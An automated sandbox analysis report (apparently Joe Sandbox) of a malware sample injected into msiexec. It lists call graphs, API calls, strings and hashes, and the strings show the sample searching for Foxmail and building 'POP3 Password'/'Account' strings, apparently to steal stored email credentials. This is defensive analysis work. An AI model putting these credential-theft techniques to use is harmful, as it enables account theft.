5949->5950 5951 21205ea0 TlsSetValue 5950->5951 5954 21205e94 5950->5954 5951->5954 5952 21202ada _ValidateLocalCookies 5 API calls 5953 21205bc8 5952->5953 5953->5916 5953->5921 5954->5952 5966 21205914 5955->5966 5961 21205c75 __crt_fast_encode_pointer 5960->5961 5964 21205c71 5960->5964 5961->5930 5962 21205c95 5962->5961 5965 21205ca1 GetProcAddress 5962->5965 5963 21205ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5963->5964 5964->5961 5964->5962 5964->5963 5965->5961 5967 21205854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 5966->5967 5968 21205938 5967->5968 5969 212058c4 5968->5969 5970 21205758 _abort 20 API calls 5969->5970 5971 212058e8 5970->5971 5971->5926 5973 21201ca6 _strlen 5972->5973 5973->5868 7585 212020db 7586 212020e7 ___scrt_is_nonwritable_in_current_image 7585->7586 7587 21202110 dllmain_raw 7586->7587 7591 2120210b 7586->7591 7597 212020f6 7586->7597 7588 2120212a 7587->7588 7587->7597 7598 21201eec 7588->7598 7590 21202177 7592 21201eec 31 API calls 7590->7592 7590->7597 7591->7590 7594 21201eec 31 API calls 7591->7594 7591->7597 7593 2120218a 7592->7593 7595 21202193 dllmain_raw 7593->7595 7593->7597 7596 2120216d dllmain_raw 7594->7596 7595->7597 7596->7590 7599 21201ef7 7598->7599 7600 21201f2a dllmain_crt_process_detach 7598->7600 7601 21201f1c dllmain_crt_process_attach 7599->7601 7602 21201efc 7599->7602 7603 21201f06 7600->7603 7601->7603 7604 21201f01 7602->7604 7605 21201f12 7602->7605 7603->7591 7604->7603 7608 2120240b 7604->7608 7613 212023ec 7605->7613 7621 212053e5 7608->7621 7714 21203513 7613->7714 7618 21202408 7618->7603 7619 2120351e 7 API calls 7620 212023f5 7619->7620 7620->7603 7627 21205aca 7621->7627 7624 2120351e 7703 21203820 7624->7703 7626 21202415 7626->7603 7628 21205ad4 7627->7628 7629 21202410 7627->7629 7630 21205e08 _abort 11 API calls 7628->7630 7629->7624 7631 21205adb 7630->7631 7631->7629 7632 21205e5e _abort 11 API calls 7631->7632 7633 21205aee 7632->7633 7635 212059b5 7633->7635 7636 212059c0 7635->7636 7637 212059d0 7635->7637 7641 212059d6 7636->7641 7637->7629 7640 2120571e _free 20 API calls 7640->7637 7642 212059ef 7641->7642 7643 212059e9 7641->7643 7645 2120571e _free 20 API calls 7642->7645 7644 2120571e _free 20 API calls 7643->7644 7644->7642 7646 212059fb 7645->7646 7647 2120571e _free 20 API calls 7646->7647 7648 21205a06 7647->7648 7649 2120571e _free 20 API calls 7648->7649 7650 21205a11 7649->7650 7651 2120571e _free 20 API calls 7650->7651 7652 21205a1c 7651->7652 7653 2120571e _free 20 API calls 7652->7653 7654 21205a27 7653->7654 7655 2120571e _free 20 API calls 7654->7655 7656 21205a32 7655->7656 7657 2120571e _free 20 API calls 7656->7657 7658 21205a3d 7657->7658 7659 2120571e _free 20 API calls 7658->7659 7660 21205a48 7659->7660 7661 2120571e _free 20 API calls 7660->7661 7662 21205a56 7661->7662 7667 2120589c 7662->7667 7673 212057a8 7667->7673 7669 212058c0 7670 212058ec 7669->7670 7686 21205809 7670->7686 7672 21205910 7672->7640 7674 212057b4 ___scrt_is_nonwritable_in_current_image 7673->7674 7681 21205671 RtlEnterCriticalSection 7674->7681 7677 212057be 7679 2120571e _free 20 API calls 7677->7679 7680 212057e8 7677->7680 7678 212057f5 _abort 7678->7669 7679->7680 7682 212057fd 7680->7682 7681->7677 7685 212056b9 RtlLeaveCriticalSection 7682->7685 7684 21205807 7684->7678 7685->7684 7687 21205815 ___scrt_is_nonwritable_in_current_image 7686->7687 7694 21205671 RtlEnterCriticalSection 7687->7694 7689 2120581f 7695 21205a7f 7689->7695 7691 21205832 7699 21205848 7691->7699 7693 21205840 _abort 7693->7672 7694->7689 7696 21205a8e __fassign 7695->7696 7697 21205ab5 __fassign 7695->7697 7696->7697 7698 21207cc2 __fassign 20 API calls 7696->7698 7697->7691 7698->7697 7702 212056b9 RtlLeaveCriticalSection 7699->7702 7701 21205852 7701->7693 7702->7701 7704 2120384b ___vcrt_freefls@4 7703->7704 7705 2120382d 7703->7705 7704->7626 7708 2120383b 7705->7708 7709 21203b67 7705->7709 7707 21203ba2 ___vcrt_FlsSetValue 6 API calls 7707->7704 7708->7707 7710 21203a82 try_get_function 5 API calls 7709->7710 7711 21203b81 7710->7711 7712 21203b99 TlsGetValue 7711->7712 7713 21203b8d 7711->7713 7712->7713 7713->7708 7720 21203856 7714->7720 7716 212023f1 7716->7620 7717 212053da 7716->7717 7718 21205b7a _abort 20 API calls 7717->7718 7719 212023fd 7718->7719 7719->7618 7719->7619 7721 21203862 GetLastError 7720->7721 7722 2120385f 7720->7722 7723 21203b67 ___vcrt_FlsGetValue 6 API calls 7721->7723 7722->7716 7724 21203877 7723->7724 7725 212038dc SetLastError 7724->7725 7726 21203ba2 ___vcrt_FlsSetValue 6 API calls 7724->7726 7731 21203896 7724->7731 7725->7716 7727 21203890 7726->7727 7728 212038b8 7727->7728 7730 21203ba2 ___vcrt_FlsSetValue 6 API calls 7727->7730 7727->7731 7729 21203ba2 ___vcrt_FlsSetValue 6 API calls 7728->7729 7728->7731 7729->7731 7730->7728 7731->7725 6381 2120281c 6384 21202882 6381->6384 6387 21203550 6384->6387 6386 2120282a 6388 2120358a 6387->6388 6389 2120355d 6387->6389 6388->6386 6389->6388 6390 212047e5 ___std_exception_copy 21 API calls 6389->6390 6391 2120357a 6390->6391 6391->6388 6393 2120544d 6391->6393 6394 2120545a 6393->6394 6395 21205468 6393->6395 6394->6395 6400 2120547f 6394->6400 6396 21206368 _free 20 API calls 6395->6396 6397 21205470 6396->6397 6398 212062ac _abort 26 API calls 6397->6398 6399 2120547a 6398->6399 6399->6388 6400->6399 6401 21206368 _free 20 API calls 6400->6401 6401->6397 7732 21204bdd 7733 21204c08 7732->7733 7734 21204bec 7732->7734 7736 21206d60 51 API calls 7733->7736 7734->7733 7735 21204bf2 7734->7735 7737 21206368 _free 20 API calls 7735->7737 7738 21204c0f GetModuleFileNameA 7736->7738 7739 21204bf7 7737->7739 7740 21204c33 7738->7740 7741 212062ac _abort 26 API calls 7739->7741 7755 21204d01 7740->7755 7742 21204c01 7741->7742 7745 21204e76 20 API calls 7746 21204c5d 7745->7746 7747 21204c72 7746->7747 7748 21204c66 7746->7748 7750 21204d01 38 API calls 7747->7750 7749 21206368 _free 20 API calls 7748->7749 7754 21204c6b 7749->7754 7752 21204c88 7750->7752 7751 2120571e _free 20 API calls 7751->7742 7753 2120571e _free 20 API calls 7752->7753 7752->7754 7753->7754 7754->7751 7756 21204d26 7755->7756 7759 21204d86 7756->7759 7761 212070eb 7756->7761 7758 21204c50 7758->7745 7759->7758 7760 212070eb 38 API calls 7759->7760 7760->7759 7764 21207092 7761->7764 7765 212054a7 __fassign 38 API calls 7764->7765 7766 212070a6 7765->7766 7766->7756

                                                              Executed Functions

                                                              Function 212010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21201137
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21201151
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120115C
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120116D
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120117C
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21201193
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 212011D0
                                                              • FindClose.KERNEL32(00000000), ref: 212011DB
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                              • String ID:
                                                              • API String ID: 1083526818-0
                                                              • Opcode ID: 297d4441e9ab2482b383d70febc1924d37f62381e28bcefed4e181003788c9c6
                                                              • Instruction ID: 1a3214f461930c56445468ae28c9912e79a4151388003f104647a2925c7ad49c
                                                              • Opcode Fuzzy Hash: 297d4441e9ab2482b383d70febc1924d37f62381e28bcefed4e181003788c9c6
                                                              • Instruction Fuzzy Hash: 2521D2725443196BD724EBA49C4CF9BBBDCEF94354F000A2AFA98D31D0EB35D6048796
                                                              Function 212012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21201434
                                                                • Part of subcall function 212010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21201137
                                                                • Part of subcall function 212010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21201151
                                                                • Part of subcall function 212010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120115C
                                                                • Part of subcall function 212010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120116D
                                                                • Part of subcall function 212010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2120117C
                                                                • Part of subcall function 212010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21201193
                                                                • Part of subcall function 212010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 212011D0
                                                                • Part of subcall function 212010F1: FindClose.KERNEL32(00000000), ref: 212011DB
                                                              • lstrlenW.KERNEL32(?), ref: 212014C5
                                                              • lstrlenW.KERNEL32(?), ref: 212014E0
                                                              • lstrlenW.KERNEL32(?,?), ref: 2120150F
                                                              • lstrcatW.KERNEL32(00000000), ref: 21201521
                                                              • lstrlenW.KERNEL32(?,?), ref: 21201547
                                                              • lstrcatW.KERNEL32(00000000), ref: 21201553
                                                              • lstrlenW.KERNEL32(?,?), ref: 21201579
                                                              • lstrcatW.KERNEL32(00000000), ref: 21201585
                                                              • lstrlenW.KERNEL32(?,?), ref: 212015AB
                                                              • lstrcatW.KERNEL32(00000000), ref: 212015B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                              • String ID: )$Foxmail$ProgramFiles
                                                              • API String ID: 672098462-2938083778
                                                              • Opcode ID: a1babf7aed26cf5b23162dbf5d579cbf14b79a8b77a772974104d1693a833b93
                                                              • Instruction ID: 010dd935b93d1ee36238af5be82f0595e63dd6028f2782ef3fb00ce0d169bda6
                                                              • Opcode Fuzzy Hash: a1babf7aed26cf5b23162dbf5d579cbf14b79a8b77a772974104d1693a833b93
                                                              • Instruction Fuzzy Hash: 1E81C871A4036DAADB20DBA1DC85FEF7379EF54700F00059AFA08E7191EA715B84CB95

                                                              Non-executed Functions

                                                              Function 212060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 212061DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 212061E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 212061F1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: e89e02d1ae8f921d3f56d17a4337605e1c6bc67cef313162e6132bea482f1462
                                                              • Instruction ID: d8221842cc029d7b0dd777306e2b90834aac0ec2c8834e76b0c48dc1610452dc
                                                              • Opcode Fuzzy Hash: e89e02d1ae8f921d3f56d17a4337605e1c6bc67cef313162e6132bea482f1462
                                                              • Instruction Fuzzy Hash: 9031F37494122D9BCB21DF64CD8879DBBB8EF18310F1042DAF91CA7260EB749B818F44
                                                              Function 21204AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,21204A8A,?,21212238,0000000C,21204BBD,00000000,00000000,?,21202082,21212108,0000000C,21201F3A,?), ref: 21204AD5
                                                              • TerminateProcess.KERNEL32(00000000,?,21204A8A,?,21212238,0000000C,21204BBD,00000000,00000000,?,21202082,21212108,0000000C,21201F3A,?), ref: 21204ADC
                                                              • ExitProcess.KERNEL32 ref: 21204AEE
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 61a11c9e7b457be158151b914c211817953bb1101759c4cf92fe684c9f4a92e4
                                                              • Instruction ID: 13a739a474e90c329985fef8250e320527219c0ab2077cb476c5fe828e321d04
                                                              • Opcode Fuzzy Hash: 61a11c9e7b457be158151b914c211817953bb1101759c4cf92fe684c9f4a92e4
                                                              • Instruction Fuzzy Hash: E0E04F35041259AFCF01AF15CD0CA593F2AFF21381B008214FA4847021DB3AE982CB44
                                                              Function 2120724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 6b05292edb24816ddafcfa39bc348cd2fafae215be2657bacb766311cc726e0a
                                                              • Instruction ID: 88b214e6a056483351b09027ed13248c19ecff5803fa4c7342dabd13046e02c7
                                                              • Opcode Fuzzy Hash: 6b05292edb24816ddafcfa39bc348cd2fafae215be2657bacb766311cc726e0a
                                                              • Instruction Fuzzy Hash: 03A011302822028F8B00CE30830E20E3AAEAA003E03000228B80CC0000EB2A80008B00
                                                              Function 2120173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 21201CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D1B
                                                                • Part of subcall function 21201CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21201D37
                                                                • Part of subcall function 21201CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D4B
                                                              • _strlen.LIBCMT ref: 21201855
                                                              • _strlen.LIBCMT ref: 21201869
                                                              • _strlen.LIBCMT ref: 2120188B
                                                              • _strlen.LIBCMT ref: 212018AE
                                                              • _strlen.LIBCMT ref: 212018C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen$File$CopyCreateDelete
                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                              • API String ID: 3296212668-3023110444
                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction ID: f2d1788a41707a342b0ec88e606525b70e69e10c1ea7ccf3a8efc4daec6d87c0
                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction Fuzzy Hash: 6A61DA71D0022EAFEF15CBE4CC40BEEBBB9AF65300F40465AF204A7255DB74AA45CB55
                                                              Function 212019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                              • API String ID: 4218353326-230879103
                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction ID: e5418f9b887e2e5916d2c270fa9804fc6cdf9144322fab532fd5a67656b9a645
                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction Fuzzy Hash: FB71D571D0026A5FDB119BA49C94BEF7BFC9B25340F10419AF644D7241E674E785CBA0
                                                              Function 21207CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 203 21207cc2-21207cd6 204 21207d44-21207d4c 203->204 205 21207cd8-21207cdd 203->205 207 21207d93-21207dab call 21207e35 204->207 208 21207d4e-21207d51 204->208 205->204 206 21207cdf-21207ce4 205->206 206->204 209 21207ce6-21207ce9 206->209 217 21207dae-21207db5 207->217 208->207 211 21207d53-21207d90 call 2120571e * 4 208->211 209->204 212 21207ceb-21207cf3 209->212 211->207 215 21207cf5-21207cf8 212->215 216 21207d0d-21207d15 212->216 215->216 219 21207cfa-21207d0c call 2120571e call 212090ba 215->219 222 21207d17-21207d1a 216->222 223 21207d2f-21207d43 call 2120571e * 2 216->223 220 21207dd4-21207dd8 217->220 221 21207db7-21207dbb 217->221 219->216 225 21207df0-21207dfc 220->225 226 21207dda-21207ddf 220->226 229 21207dd1 221->229 230 21207dbd-21207dc0 221->230 222->223 231 21207d1c-21207d2e call 2120571e call 212091b8 222->231 223->204 225->217 236 21207dfe-21207e0b call 2120571e 225->236 233 21207de1-21207de4 226->233 234 21207ded 226->234 229->220 230->229 238 21207dc2-21207dd0 call 2120571e * 2 230->238 231->223 233->234 243 21207de6-21207dec call 2120571e 233->243 234->225 238->229 243->234
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 21207D06
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 212090D7
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 212090E9
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 212090FB
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 2120910D
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 2120911F
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209131
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209143
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209155
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209167
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209179
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 2120918B
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 2120919D
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 212091AF
                                                              • _free.LIBCMT ref: 21207CFB
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 21207D1D
                                                              • _free.LIBCMT ref: 21207D32
                                                              • _free.LIBCMT ref: 21207D3D
                                                              • _free.LIBCMT ref: 21207D5F
                                                              • _free.LIBCMT ref: 21207D72
                                                              • _free.LIBCMT ref: 21207D80
                                                              • _free.LIBCMT ref: 21207D8B
                                                              • _free.LIBCMT ref: 21207DC3
                                                              • _free.LIBCMT ref: 21207DCA
                                                              • _free.LIBCMT ref: 21207DE7
                                                              • _free.LIBCMT ref: 21207DFF
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: bfb479e2a64ca046a6d360d862c02125eae95bd4044c661ca6f3fc82733cebbf
                                                              • Instruction ID: 5994b8c38ca339443640b2e446a3ac63b8c5eeec8c7325ec7181f59044dd4fec
                                                              • Opcode Fuzzy Hash: bfb479e2a64ca046a6d360d862c02125eae95bd4044c661ca6f3fc82733cebbf
                                                              • Instruction Fuzzy Hash: 77315E32600246DFEB259B38DD40B667BEEEF22310F104669FA89D7165DF31B980DB14
                                                              Function 212059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • _free.LIBCMT ref: 212059EA
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 212059F6
                                                              • _free.LIBCMT ref: 21205A01
                                                              • _free.LIBCMT ref: 21205A0C
                                                              • _free.LIBCMT ref: 21205A17
                                                              • _free.LIBCMT ref: 21205A22
                                                              • _free.LIBCMT ref: 21205A2D
                                                              • _free.LIBCMT ref: 21205A38
                                                              • _free.LIBCMT ref: 21205A43
                                                              • _free.LIBCMT ref: 21205A51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: df8b6ea64f62b35fc1991b1927547855cd4c8f19c6835d8b362154902cdee29c
                                                              • Instruction ID: f6d72552699628432b7c98fd7d1be30a9289cefa0eb790445be636208f4b47fa
                                                              • Opcode Fuzzy Hash: df8b6ea64f62b35fc1991b1927547855cd4c8f19c6835d8b362154902cdee29c
                                                              • Instruction Fuzzy Hash: 4211747A520149EFCB15DF58CC41CED3FADEF24350B5542A5BE088B239DA32EE50AB84
                                                              Function 2120AA53 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 287 2120aa53-2120aa6e 288 2120aa80 287->288 289 2120aa70-2120aa7e RtlDecodePointer 287->289 290 2120aa85-2120aa8b 288->290 289->290 291 2120aa91 290->291 292 2120abb2-2120abb5 290->292 293 2120aba6 291->293 294 2120aa97-2120aa9a 291->294 295 2120ac12 292->295 296 2120abb7-2120abba 292->296 299 2120aba8-2120abad 293->299 300 2120aaa0 294->300 301 2120ab47-2120ab4a 294->301 302 2120ac19 295->302 297 2120ac06 296->297 298 2120abbc-2120abbf 296->298 297->295 306 2120abc1-2120abc4 298->306 307 2120abfa 298->307 310 2120ac5b-2120ac6a call 21202ada 299->310 303 2120ab34-2120ab42 300->303 304 2120aaa6-2120aaab 300->304 308 2120ab4c-2120ab4f 301->308 309 2120ab9d-2120aba4 301->309 305 2120ac20-2120ac49 302->305 303->305 311 2120ab25-2120ab2f 304->311 312 2120aaad-2120aab0 304->312 334 2120ac56-2120ac59 305->334 335 2120ac4b-2120ac50 call 21206368 305->335 313 2120abc6-2120abc9 306->313 314 2120abee 306->314 307->297 315 2120ab51-2120ab54 308->315 316 2120ab94-2120ab9b 308->316 318 2120ab61-2120ab8f 309->318 311->305 319 2120aab2-2120aab5 312->319 320 2120ab1c-2120ab23 312->320 322 2120abe2 313->322 323 2120abcb-2120abd0 313->323 314->307 315->310 324 2120ab5a 315->324 316->302 318->334 326 2120aab7-2120aaba 319->326 327 2120ab0d-2120ab17 319->327 331 2120aac7-2120aaf7 320->331 322->314 328 2120abd2-2120abd5 323->328 329 2120abdb-2120abe0 323->329 324->318 326->310 332 2120aac0 326->332 327->305 328->310 328->329 329->299 331->334 341 2120aafd-2120ab08 call 21206368 331->341 332->331 334->310 335->334 341->334
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: 789b1e2a6df6362537e16557bfc59a139fdc06e1254ac00904265388cef3b12a
                                                              • Instruction ID: 5597838068193d11c86cd61645ccb7adcca502e1d0893cb6157af65e317506bc
                                                              • Opcode Fuzzy Hash: 789b1e2a6df6362537e16557bfc59a139fdc06e1254ac00904265388cef3b12a
                                                              • Instruction Fuzzy Hash: 05518D7090091ACBDF00CFA4DD885ECBFB5FB2A310F914789F680A7655DB768A64CB14
                                                              Function 21201CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D1B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21201D37
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D4B
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D58
